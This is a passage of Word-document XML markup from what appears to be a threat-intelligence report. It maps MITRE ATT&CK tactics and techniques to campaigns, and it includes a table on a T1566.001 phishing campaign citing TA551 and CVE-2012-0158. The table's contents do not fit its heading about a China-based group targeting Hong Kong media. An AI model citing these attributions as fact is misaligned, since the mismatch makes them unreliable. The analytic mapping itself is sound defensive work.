          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A24ABAD" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="009912FB" w:rsidRDefault="007074DF" w:rsidP="006539AC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009912FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1071.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009912FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDAFC2A" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="007074DF" w:rsidRDefault="007074DF" w:rsidP="006539AC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1132.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data Encoding&gt;:Standard Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B08BBE3" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="007074DF"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E5CAE6" w14:textId="291CCB35" w:rsidR="007074DF" w:rsidRPr="005935F8" w:rsidRDefault="007074DF" w:rsidP="006539AC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007074DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C74B23F" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="007074DF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="_Toc153480904"/>
      <w:r>
        <w:t xml:space="preserve">T1566.001 - </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4630">
        <w:t>China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>
    </w:p>
    <w:p w14:paraId="23E71A9B" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="007074DF">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7074DF" w:rsidRPr="002D1D50" w14:paraId="1C2A6DA1" w14:textId="77777777" w:rsidTr="00AE6A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73F463FA" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01AC6C74" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="002D1D50" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EC950B7" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="00387DCC" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007074DF" w:rsidRPr="00B857D7" w14:paraId="4CC997A6" w14:textId="77777777" w:rsidTr="00AE6A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22BC683F" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30F7F98D" w14:textId="3DFBD961" w:rsidR="007074DF" w:rsidRDefault="00CE00AC" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TA551</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="342D66B2" w14:textId="300D1C14" w:rsidR="007074DF" w:rsidRPr="00387DCC" w:rsidRDefault="00CE00AC" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007074DF" w:rsidRPr="00B857D7" w14:paraId="6AACA861" w14:textId="77777777" w:rsidTr="00AE6A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CCBA51A" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="007328DE" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B89C291" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="007328DE" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">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4EFA12B6" w14:textId="0CD9BDB3" w:rsidR="007074DF" w:rsidRPr="00387DCC" w:rsidRDefault="00CE00AC" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007074DF" w:rsidRPr="00B857D7" w14:paraId="559AF7F8" w14:textId="77777777" w:rsidTr="00AE6A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CC49063" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BE42F89" w14:textId="09068AA1" w:rsidR="007074DF" w:rsidRPr="007328DE" w:rsidRDefault="00CE00AC" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Unknown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C006121" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="00387DCC" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007074DF" w:rsidRPr="00B857D7" w14:paraId="759685C0" w14:textId="77777777" w:rsidTr="00AE6A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3527BBC9" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="505BEDED" w14:textId="75F2D529" w:rsidR="007074DF" w:rsidRDefault="00CE00AC" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Unknown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71C38A1E" w14:textId="544B312B" w:rsidR="007074DF" w:rsidRPr="00387DCC" w:rsidRDefault="00CE00AC" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] Speaks of English, German or Japanese speaking targets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007074DF" w:rsidRPr="00B857D7" w14:paraId="5CEB4389" w14:textId="77777777" w:rsidTr="00AE6A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A960379" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58100203" w14:textId="5A345139" w:rsidR="007074DF" w:rsidRDefault="00CE00AC" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Unknown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="792A0ABF" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="00387DCC" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007074DF" w:rsidRPr="00B857D7" w14:paraId="79CACBC5" w14:textId="77777777" w:rsidTr="00AE6A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="488ACC3D" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FCA2877" w14:textId="2E74C793" w:rsidR="007074DF" w:rsidRDefault="00CE00AC" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Unknown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="597F0AB6" w14:textId="3D06636F" w:rsidR="007074DF" w:rsidRDefault="00CE00AC" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r w:rsidR="00E200F3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[4] </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Notes financial motivation for threat group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007074DF" w:rsidRPr="00B857D7" w14:paraId="269DB9D2" w14:textId="77777777" w:rsidTr="00AE6A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73F834BB" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="140BE6FE" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVE-2012-0158</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27A957E5" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007074DF" w:rsidRPr="00B857D7" w14:paraId="6E671215" w14:textId="77777777" w:rsidTr="00AE6A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BEE67A9" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="540B84FA" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58F948B4" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007074DF" w:rsidRPr="00B857D7" w14:paraId="12433F4C" w14:textId="77777777" w:rsidTr="00AE6A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="032D90AA" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="061385EE" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3605A978" w14:textId="065DA1C7" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007074DF" w:rsidRPr="00B857D7" w14:paraId="5FDFA24E" w14:textId="77777777" w:rsidTr="00AE6A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38E00194" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04A962BC" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="713D8336" w14:textId="5113FBCD" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007074DF" w:rsidRPr="00B857D7" w14:paraId="059C0786" w14:textId="77777777" w:rsidTr="00AE6A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2162758F" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5944C604" w14:textId="6E082076" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidR="00CE00AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E6D63D7" w14:textId="5996B9AA" w:rsidR="007074DF" w:rsidRDefault="00CE00AC" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] Report on 2020 campaign</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007074DF" w:rsidRPr="00B857D7" w14:paraId="45A0FE42" w14:textId="77777777" w:rsidTr="00AE6A0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DD9600B" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="274660F6" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52028479" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C46FDD2" w14:textId="77777777" w:rsidR="007074DF" w:rsidRPr="00AC7A85" w:rsidRDefault="007074DF" w:rsidP="007074DF"/>
    <w:p w14:paraId="5A8444F1" w14:textId="77777777" w:rsidR="007074DF" w:rsidRDefault="007074DF" w:rsidP="007074DF">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
